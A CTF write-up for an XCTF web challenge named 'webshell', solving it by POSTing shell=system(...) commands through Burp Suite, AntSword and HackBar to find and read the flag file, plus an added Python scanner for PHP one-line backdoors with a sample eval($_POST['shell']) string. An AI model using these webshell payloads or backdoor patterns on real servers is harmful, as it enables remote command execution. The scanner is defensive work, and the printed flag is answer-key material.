XCTF Attack and Defense World, web advanced area: webshell
2022-08-01 22:07:00 【l8947943】
0x01. Enter the environment and view the content

The page hints that a webshell is to be used.
0x02. Problem Analysis
0x02_1. What is webshell
A webshell is a code-execution environment in the form of a web file (asp, php, jsp, cgi, ...), mainly used for website management, server management, permission management and similar operations. It is simple to use: upload a single code file and access it through the website, and many daily tasks can then be carried out, which makes managing the website and server much easier. For exactly that reason, a small number of people modify such code and use it as a backdoor program to take control of the web server.
0x02_2. Start solving
We use Burp Suite to intercept the request and send it to Repeater, as shown in the figure:
We add the shell script at the bottom of the request; note that three things need to be changed:
- Change the request method to POST
- Add the Content-Type header: Content-Type: application/x-www-form-urlencoded
- Put the shell script in the request body:
shell=system("find / -name 'flag*'");
As shown:
You can see that /var/www/html/flag.txt is returned.
Then we read the flag itself with the script shell=system("cat /var/www/html/flag.txt"); as shown in the figure:
Get the final answer: cyberpeace{f3338db17dcd9233ed4c0685cf6f8c56}
0x03. Solution 2
We can look at the page source, as shown in the figure:
You can see that a Trojan (a one-line webshell) has been uploaded directly to this page, so we open AntSword and connect to the page URL directly, as shown in the figure:
After connecting, the files can be browsed, as shown in the figure:
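As an added example that is not part of the original write-up: a small Python scanner a defender can run over a web root to flag one-line PHP backdoors of the kind this challenge exposes (untrusted request data passed straight to eval or a shell-command sink). The PHP snippets below are constructed samples; the `shell` POST parameter name is taken from the write-up.

```python
import re
from pathlib import Path
from typing import Dict, List, Pattern, Tuple

# Constructed sample: one-line PHP backdoor that evaluates whatever arrives in the
# POST parameter "shell" (parameter name from the write-up).
SAMPLE_WEBSHELL = "<?php @eval($_POST['shell']); ?>"

# Constructed benign sample: reads request input but never executes it.
SAMPLE_BENIGN = "<?php echo htmlspecialchars($_GET['name'] ?? 'guest'); ?>"

# Request superglobal used as the argument of a sink, e.g. "$_POST[" or "$_GET [".
SUPERGLOBAL = r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\["

# (label, pattern): each rule matches untrusted request data flowing into a
# code- or command-execution sink, optionally error-suppressed with "@".
RULES: List[Tuple[str, Pattern[str]]] = [
    ("eval of request input",
     re.compile(r"@?\beval\s*\(\s*" + SUPERGLOBAL, re.I)),
    ("assert of request input",
     re.compile(r"@?\bassert\s*\(\s*" + SUPERGLOBAL, re.I)),
    ("shell command from request input",
     re.compile(r"@?\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*"
                + SUPERGLOBAL, re.I)),
    ("eval of decoded payload",
     re.compile(r"@?\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
]


def scan_php_source(src: str) -> List[str]:
    """Return the labels of every rule that matches the given PHP source text."""
    return [label for label, pat in RULES if pat.search(src)]


def is_suspect(src: str) -> bool:
    """True if the source contains at least one webshell indicator."""
    return bool(scan_php_source(src))


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a web root and map each suspicious .php file to its matched rule labels."""
    findings: Dict[str, List[str]] = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_php_source(path.read_text(errors="ignore"))
        if hits:
            findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    for name, src in (("webshell", SAMPLE_WEBSHELL), ("benign", SAMPLE_BENIGN)):
        print(name, scan_php_source(src))
```

The rules are indicators, not proof: a hit means the file hands request data to an execution sink and deserves a manual look, and obfuscated backdoors that build the sink name dynamically will not match.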
0x04. Solution 3
Use HackBar directly and send the shell script in a POST request, as shown in the figure:

You can directly get the final answer.